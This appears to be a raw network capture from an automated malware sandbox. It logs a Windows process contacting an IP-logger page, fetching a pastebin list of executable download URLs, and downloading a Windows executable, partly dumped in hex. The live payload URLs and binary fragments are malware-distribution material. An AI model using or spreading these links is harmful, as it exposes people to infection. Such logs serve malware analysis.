                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=z79NIseXxPGllbRUFcAdocKaz3uypYodjM5tUb%2F4pPG2IJprqWgQLr5mqoJMVpqdedQehw50IqxLj1PKVr18eGcl5EUmMhtf4KLtH4SPF2VTnoi%2FOy0rqm8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628201a98d20a01-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC471INData Raw: 31 64 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                                                                                                                                                                                                                                                            Data Ascii: 1d16<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1369INData Raw: 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72
                                                                                                                                                                                                                                                            Data Ascii: r" content="7 days" /><meta name="keywords" content="" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property="og:image" content="https://cdn.iplogger.or
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1369INData Raw: 6e 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 7b 68 65 69 67 68 74 3a 31 36 70 78 3b 77 69 64 74 68 3a 31 36 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69
                                                                                                                                                                                                                                                            Data Ascii: ne}#loader>span{height:16px;width:16px;border-radius:50%;background-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;ani
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1369INData Raw: 72 69 70 74 3e 0a 09 76 61 72 20 5f 70 3b 0a 09 69 66 28 6e 61 76 69 67 61 74 6f 72 26 26 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 26 26 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                                            Data Ascii: ript>var _p;if(navigator&&navigator.userAgentData&&navigator.userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1369INData Raw: 6f 72 65 20 70 72 6f 63 65 73 73 69 6e 67 2e 2e 2e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 5f 63 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79
                                                                                                                                                                                                                                                            Data Ascii: ore processing...</div></div> <script> _c();</script><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1369INData Raw: 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f 6d 61 69 6e 22 3e 79 69 70 2e 73 75 3c 2f 64 69
                                                                                                                                                                                                                                                            Data Ascii: .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="domain">yip.su</di
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC138INData Raw: 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: ute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            23192.168.2.555589104.20.68.14344344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC50OUTGET /raw/E0rY26ni HTTP/1.1
                                                                                                                                                                                                                                                            Host: pastebin.com
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC395INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:56 GMT
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            x-frame-options: DENY
                                                                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                                                                            x-xss-protection: 1;mode=block
                                                                                                                                                                                                                                                            cache-control: public, max-age=1801
                                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                                            Age: 3
                                                                                                                                                                                                                                                            Last-Modified: Mon, 11 Mar 2024 02:30:53 GMT
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628201a8ffb0acd-LAS
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC800INData Raw: 33 31 39 0d 0a 68 74 74 70 3a 2f 2f 31 38 35 2e 31 37 32 2e 31 32 38 2e 31 32 36 2f 49 6e 73 74 61 6c 6c 53 65 74 75 70 35 2e 65 78 65 0d 0a 68 74 74 70 73 3a 2f 2f 62 69 74 62 75 63 6b 65 74 2e 6f 72 67 2f 6a 2d 75 70 73 70 73 2f 6d 69 63 72 6f 73 6f 66 74 5f 6e 65 74 77 6f 72 6b 31 2f 64 6f 77 6e 6c 6f 61 64 73 2f 61 30 32 2e 65 78 65 0d 0a 68 74 74 70 73 3a 2f 2f 73 68 69 70 6f 66 64 65 73 74 69 6e 79 2e 63 6f 6d 2f 62 61 66 31 34 37 37 38 63 32 34 36 65 31 35 35 35 30 36 34 35 65 33 30 62 61 37 38 63 65 31 63 2e 65 78 65 0d 0a 68 74 74 70 73 3a 2f 2f 73 74 79 2e 69 6e 6b 2f 70 70 67 38 78 0d 0a 68 74 74 70 73 3a 2f 2f 6e 61 6d 65 6d 61 69 6c 2e 6f 72 67 2f 36 37 37 39 64 38 39 62 37 61 33 36 38 66 34 66 33 66 33 34 30 62 35 30 61 39 64 31 38 64 37 31
                                                                                                                                                                                                                                                            Data Ascii: 319http://185.172.128.126/InstallSetup5.exehttps://bitbucket.org/j-upsps/microsoft_network1/downloads/a02.exehttps://shipofdestiny.com/baf14778c246e15550645e30ba78ce1c.exehttps://sty.ink/ppg8xhttps://namemail.org/6779d89b7a368f4f3f340b50a9d18d71
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            24192.168.2.555586104.21.63.7144344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC134OUTGET /26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: lawyerbuyer.org
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC679INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:57 GMT
                                                                                                                                                                                                                                                            Content-Type: application/x-ms-dos-executable
                                                                                                                                                                                                                                                            Content-Length: 4283792
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Last-Modified: Sun, 10 Mar 2024 22:53:03 GMT
                                                                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                                                                            CF-Cache-Status: MISS
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=c4Wns%2FE9P5dgKTrL%2FqwzwFYxW3F%2BbnDTRsOeLS4rE8YqpfLvP8%2FFZHD0uo3ELspqag2LrlusgrHw0iDbCzQZoaSH9%2BsIquYOJCODyZAh%2FWWS5hRw3s89LISnqk1CTxlz6vA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628201a683009f1-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC690INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a5 10 45 5e e1 71 2b 0d e1 71 2b 0d e1 71 2b 0d 8e 07 80 0d f5 71 2b 0d 8e 07 b5 0d f6 71 2b 0d 8e 07 81 0d b8 71 2b 0d e8 09 b8 0d e2 71 2b 0d e1 71 2a 0d ba 71 2b 0d 8e 07 84 0d e0 71 2b 0d 8e 07 b1 0d e0 71 2b 0d 8e 07 b6 0d e0 71 2b 0d 52 69 63 68 e1 71 2b 0d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 2b 84 4d 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 96 00
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$E^q+q+q+q+q+q+q+q*q+q+q+q+Richq+PEL+Mc
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1369INData Raw: 66 8c 0d a4 ee 80 00 66 8c 1d 80 ee 80 00 66 8c 05 7c ee 80 00 66 8c 25 78 ee 80 00 66 8c 2d 74 ee 80 00 9c 8f 05 a8 ee 80 00 8b 45 00 a3 9c ee 80 00 8b 45 04 a3 a0 ee 80 00 8d 45 08 a3 ac ee 80 00 8b 85 e0 fc ff ff c7 05 e8 ed 80 00 01 00 01 00 a1 a0 ee 80 00 a3 9c ed 80 00 c7 05 90 ed 80 00 09 04 00 c0 c7 05 94 ed 80 00 01 00 00 00 a1 04 d0 80 00 89 85 d8 fc ff ff a1 08 d0 80 00 89 85 dc fc ff ff ff 15 ac b0 40 00 a3 e0 ed 80 00 6a 01 e8 e5 16 00 00 59 6a 00 ff 15 a8 b0 40 00 68 90 b1 40 00 ff 15 6c b0 40 00 83 3d e0 ed 80 00 00 75 08 6a 01 e8 c1 16 00 00 59 68 09 04 00 c0 ff 15 a4 b0 40 00 50 ff 15 a0 b0 40 00 c9 c3 8b ff 55 8b ec 8b 45 08 33 c9 3b 04 cd 10 d0 80 00 74 13 41 83 f9 2d 72 f1 8d 48 ed 83 f9 11 77 0e 6a 0d 58 5d c3 8b 04 cd 14 d0 80 00 5d
                                                                                                                                                                                                                                                            Data Ascii: fff|f%xf-tEEE@jYj@h@l@=ujYh@P@UE3;tA-rHwjX]]
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1369INData Raw: 00 6a 01 ff 75 08 e8 99 fe ff ff 83 c4 0c 5d c3 6a 01 6a 00 6a 00 e8 89 fe ff ff 83 c4 0c c3 6a 01 6a 01 6a 00 e8 7a fe ff ff 83 c4 0c c3 8b ff 55 8b ec e8 4b 05 00 00 ff 75 08 e8 94 03 00 00 59 68 ff 00 00 00 e8 af ff ff ff cc 68 10 1a 40 00 64 ff 35 00 00 00 00 8b 44 24 10 89 6c 24 10 8d 6c 24 10 2b e0 53 56 57 a1 04 d0 80 00 31 45 fc 33 c5 50 89 65 e8 ff 75 f8 8b 45 fc c7 45 fc fe ff ff ff 89 45 f8 8d 45 f0 64 a3 00 00 00 00 c3 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5f 5e 5b 8b e5 5d 51 c3 cc cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 18 53 8b 5d 0c 56 8b 73 08 33 35 04 d0 80 00 57 8b 06 c6 45 ff 00 c7 45 f4 01 00 00 00 8d 7b 10 83 f8 fe 74 0d 8b 4e 04 03 cf 33 0c 38 e8 b7 f5 ff ff 8b 4e 0c 8b 46 08 03 cf 33 0c 38 e8 a7 f5 ff ff 8b 45 08 f6 40 04 66 0f 85 19
                                                                                                                                                                                                                                                            Data Ascii: ju]jjjjjjzUKuYhh@d5D$l$l$+SVW1E3PeuEEEEdMdY__^[]QUS]Vs35WEE{tN38NF38E@f
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1369INData Raw: ff ff 50 88 5d fb e8 58 15 00 00 59 50 8d 85 08 fe ff ff 50 56 ff 15 cc b0 40 00 8b 4d fc 5f 5e 33 cd 5b e8 1b f1 ff ff c9 c3 6a 03 e8 e9 18 00 00 59 83 f8 01 74 15 6a 03 e8 dc 18 00 00 59 85 c0 75 1f 83 3d 00 d0 80 00 01 75 16 68 fc 00 00 00 e8 25 fe ff ff 68 ff 00 00 00 e8 1b fe ff ff 59 59 c3 8b ff 55 8b ec 56 e8 85 08 00 00 8b f0 85 f6 0f 84 32 01 00 00 8b 4e 5c 8b 55 08 8b c1 57 39 10 74 0d 83 c0 0c 8d b9 90 00 00 00 3b c7 72 ef 81 c1 90 00 00 00 3b c1 73 04 39 10 74 02 33 c0 85 c0 74 07 8b 50 08 85 d2 75 07 33 c0 e9 f5 00 00 00 83 fa 05 75 0c 83 60 08 00 33 c0 40 e9 e4 00 00 00 83 fa 01 0f 84 d8 00 00 00 8b 4d 0c 53 8b 5e 60 89 4e 60 8b 48 04 83 f9 08 0f 85 b6 00 00 00 6a 24 59 8b 7e 5c 83 64 39 08 00 83 c1 0c 81 f9 90 00 00 00 7c ed 8b 00 8b 7e 64
                                                                                                                                                                                                                                                            Data Ascii: P]XYPPV@M_^3[jYtjYu=uh%hYYUV2N\UW9t;r;s9t3tPu3u`3@MS^`N`Hj$Y~\d9|~d
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1369INData Raw: 8d 90 00 08 00 00 a3 00 55 85 00 89 35 f8 54 85 00 3b c2 73 36 83 c0 05 83 48 fb ff 66 c7 40 ff 00 0a 89 48 03 66 c7 40 1f 00 0a c6 40 21 0a 89 48 33 88 48 2f 8b 35 00 55 85 00 83 c0 40 8d 50 fb 81 c6 00 08 00 00 3b d6 72 cd 53 57 66 39 4d e6 0f 84 0e 01 00 00 8b 45 e8 3b c1 0f 84 03 01 00 00 8b 18 83 c0 04 89 45 fc 03 c3 be 00 08 00 00 89 45 f8 3b de 7c 02 8b de 39 1d f8 54 85 00 7d 6b bf 04 55 85 00 6a 40 6a 20 e8 52 f1 ff ff 59 59 85 c0 74 51 83 05 f8 54 85 00 20 8d 88 00 08 00 00 89 07 3b c1 73 31 83 c0 05 83 48 fb ff 83 60 03 00 80 60 1f 80 83 60 33 00 66 c7 40 ff 00 0a 66 c7 40 20 0a 0a c6 40 2f 00 8b 0f 83 c0 40 03 ce 8d 50 fb 3b d1 72 d2 83 c7 04 39 1d f8 54 85 00 7c a2 eb 06 8b 1d f8 54 85 00 33 ff 85 db 7e 72 8b 45 f8 8b 00 83 f8 ff 74 5c 83 f8
                                                                                                                                                                                                                                                            Data Ascii: U5T;s6Hf@Hf@@!H3H/5U@P;rSWf9ME;EE;|9T}kUj@j RYYtQT ;s1H```3f@f@ @/@P;r9T|T3~rEt\
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1369INData Raw: 00 59 c3 8b ff 57 68 54 bc 40 00 ff 15 bc b0 40 00 8b f8 85 ff 75 09 e8 34 fd ff ff 33 c0 5f c3 56 8b 35 b8 b0 40 00 68 90 bc 40 00 57 ff d6 68 84 bc 40 00 57 a3 2c f9 80 00 ff d6 68 78 bc 40 00 57 a3 30 f9 80 00 ff d6 68 70 bc 40 00 57 a3 34 f9 80 00 ff d6 83 3d 2c f9 80 00 00 8b 35 f0 b0 40 00 a3 38 f9 80 00 74 16 83 3d 30 f9 80 00 00 74 0d 83 3d 34 f9 80 00 00 74 04 85 c0 75 24 a1 ec b0 40 00 a3 30 f9 80 00 a1 f4 b0 40 00 c7 05 2c f9 80 00 82 26 40 00 89 35 34 f9 80 00 a3 38 f9 80 00 ff 15 e8 b0 40 00 a3 c4 d1 80 00 83 f8 ff 0f 84 c1 00 00 00 ff 35 30 f9 80 00 50 ff d6 85 c0 0f 84 b0 00 00 00 e8 dd ec ff ff ff 35 2c f9 80 00 8b 35 88 b0 40 00 ff d6 ff 35 30 f9 80 00 a3 2c f9 80 00 ff d6 ff 35 34 f9 80 00 a3 30 f9 80 00 ff d6 ff 35 38 f9 80 00 a3 34 f9
                                                                                                                                                                                                                                                            Data Ascii: YWhT@@u43_V5@h@Wh@W,hx@W0hp@W4=,5@8t=0t=4tu$@0@,&@548@50P5,5@50,540584
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1369INData Raw: ea ff ff 59 ff 36 ff 15 1c b1 40 00 5e 5d c3 6a 08 68 50 bf 80 00 e8 cd ea ff ff e8 41 f9 ff ff 8b 40 78 85 c0 74 16 83 65 fc 00 ff d0 eb 07 33 c0 40 c3 8b 65 e8 c7 45 fc fe ff ff ff e8 a0 17 00 00 e8 e6 ea ff ff c3 68 d7 2e 40 00 ff 15 88 b0 40 00 a3 90 fa 80 00 c3 8b ff 55 8b ec 8b 45 08 a3 94 fa 80 00 a3 98 fa 80 00 a3 9c fa 80 00 a3 a0 fa 80 00 5d c3 8b ff 55 8b ec 8b 45 08 8b 0d 4c bc 40 00 56 39 50 04 74 0f 8b f1 6b f6 0c 03 75 08 83 c0 0c 3b c6 72 ec 6b c9 0c 03 4d 08 5e 3b c1 73 05 39 50 04 74 02 33 c0 5d c3 ff 35 9c fa 80 00 ff 15 8c b0 40 00 c3 6a 20 68 70 bf 80 00 e8 21 ea ff ff 33 ff 89 7d e4 89 7d d8 8b 5d 08 83 fb 0b 7f 4b 74 15 8b c3 6a 02 59 2b c1 74 22 2b c1 74 08 2b c1 74 59 2b c1 75 43 e8 f5 f7 ff ff 8b f8 89 7d d8 85 ff 75 14 83 c8 ff
                                                                                                                                                                                                                                                            Data Ascii: Y6@^]jhPA@xte3@eEh.@@UE]UEL@V9Ptku;rkM^;s9Pt3]5@j hp!3}}]KtjY+t"+t+tY+uC}u
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1369INData Raw: 4c 24 04 f7 c1 03 00 00 00 74 24 8a 01 83 c1 01 84 c0 74 4e f7 c1 03 00 00 00 75 ef 05 00 00 00 00 8d a4 24 00 00 00 00 8d a4 24 00 00 00 00 8b 01 ba ff fe fe 7e 03 d0 83 f0 ff 33 c2 83 c1 04 a9 00 01 01 81 74 e8 8b 41 fc 84 c0 74 32 84 e4 74 24 a9 00 00 ff 00 74 13 a9 00 00 00 ff 74 02 eb cd 8d 41 ff 8b 4c 24 04 2b c1 c3 8d 41 fe 8b 4c 24 04 2b c1 c3 8d 41 fd 8b 4c 24 04 2b c1 c3 8d 41 fc 8b 4c 24 04 2b c1 c3 8b ff 55 8b ec 83 ec 24 a1 04 d0 80 00 33 c5 89 45 fc 8b 45 08 53 89 45 e0 8b 45 0c 56 57 89 45 e4 e8 a8 f1 ff ff 83 65 ec 00 83 3d b0 fa 80 00 00 89 45 e8 75 7d 68 00 bd 40 00 ff 15 20 b0 40 00 8b d8 85 db 0f 84 10 01 00 00 8b 3d b8 b0 40 00 68 f4 bc 40 00 53 ff d7 85 c0 0f 84 fa 00 00 00 8b 35 88 b0 40 00 50 ff d6 68 e4 bc 40 00 53 a3 b0 fa 80 00
                                                                                                                                                                                                                                                            Data Ascii: L$t$tNu$$~3tAt2t$ttAL$+AL$+AL$+AL$+U$3EESEEVWEe=Eu}h@ @=@h@S5@Ph@S
